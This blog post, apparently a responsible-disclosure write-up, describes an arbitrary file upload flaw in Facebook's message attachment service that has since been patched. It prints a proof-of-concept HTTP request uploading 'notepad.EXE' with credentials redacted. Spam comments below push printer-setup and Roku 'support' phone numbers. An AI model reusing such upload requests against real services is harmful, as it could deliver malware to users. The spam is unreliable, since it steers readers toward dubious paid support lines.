Sow Ching Shiong, an independent vulnerability researcher has discovered an Arbitrary File Upload vulnerability in attachments.facebook.com, which can be exploited by an attacker to compromise a victim's computer system.
Proof of concept
HTTP Request
===========
POST /ajax/messaging/upload.php HTTP/1.1Host: attachments.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
DNT: 1
Proxy-Connection: keep-alive
Cookie: [information removed]
Content-Type: multipart/form-data; boundary=---------------------------4827543632391
Content-Length: 194188
-----------------------------4827543632391
Content-Disposition: form-data; name="post_form_id"
[information removed]
-----------------------------4827543632391
Content-Disposition: form-data; name="fb_dtsg"
[information removed]
-----------------------------4827543632391
Content-Disposition: form-data; name="id"
[information removed]
-----------------------------4827543632391
Content-Disposition: form-data; name="attachment"; filename="notepad.EXE"
Content-Type: application/octet-stream
Conclusion
This vulnerability has been confirmed and patched by Facebook Security Team. I would like to thank them for their quick response to my report.
Facebook White Hat
https://www.facebook.com/whitehat
.png)
.png)
.png)
123 HP Envy 5075 Printer Setup, 123 HP Envy 5075 Printer Setup, 123 HP Envy 5075 Printer Setup, 123 HP Envy 5075 Printer Setup
ReplyDeleteSupporting you 123.hp.com/setup 5258
ReplyDelete123.hp.com/setup 3700
ReplyDelete123.hp.com/setup 3735
ReplyDelete123.hp.com/setup 7820
ReplyDelete123.hp.com/setup 5541
ReplyDelete123.hp.com/setup 5264
ReplyDeleteHi, probably our entry may be off topic but anyways, I have been surfing around your blog and it looks very professional. It’s obvious you know your topic and you appear fervent about it. I’m developing a fresh blog plus I’m struggling to make it look good, as well as offer the best quality content. I have learned much at your web site and also I anticipate alot more articles and will be coming back soon. Thanks you.
ReplyDelete123.hp.com/ojpro8710
Taking about Alexa & Echo duo the Echo is the loudspeaker whereas Alexa is the speech software. They together work to perform a various task that we call as Alexa skills.
ReplyDeletefor more details 844 260 1666.
https://setup-wireless-printer.com/hp-photosmart-c5288-wireless-driver-mac/
ReplyDelete123hp.co/setup
ReplyDelete123hp.co/setup
ReplyDeletefor more information visit us Roku.com/link
ReplyDeleteIt’s our vision to offer timely support for HP customers as we are an independent service provider. The top services that we offer include 123.hp.com/setup, software download, troubleshooting network issues, suggest the top device models to buy and much more. Reach out to our support executives for assistance and you can dial the support number +1-844-876-5110
ReplyDelete123.hp.com, canon pixma mg4250 driver , canon pixma mp990 driver , canon pixma mp620b driver , canon imageclass mf215 driver ,
ReplyDeleteThis comment has been removed by the author.
ReplyDeleteYou will have to use the Roku Activation code on roku.com/link. And aftercompleting your registration, you are all set to dive into the pool of entertainment.To proceed with this you need to insert the Roku streaming stick on HDMI slot behind your TV.
ReplyDelete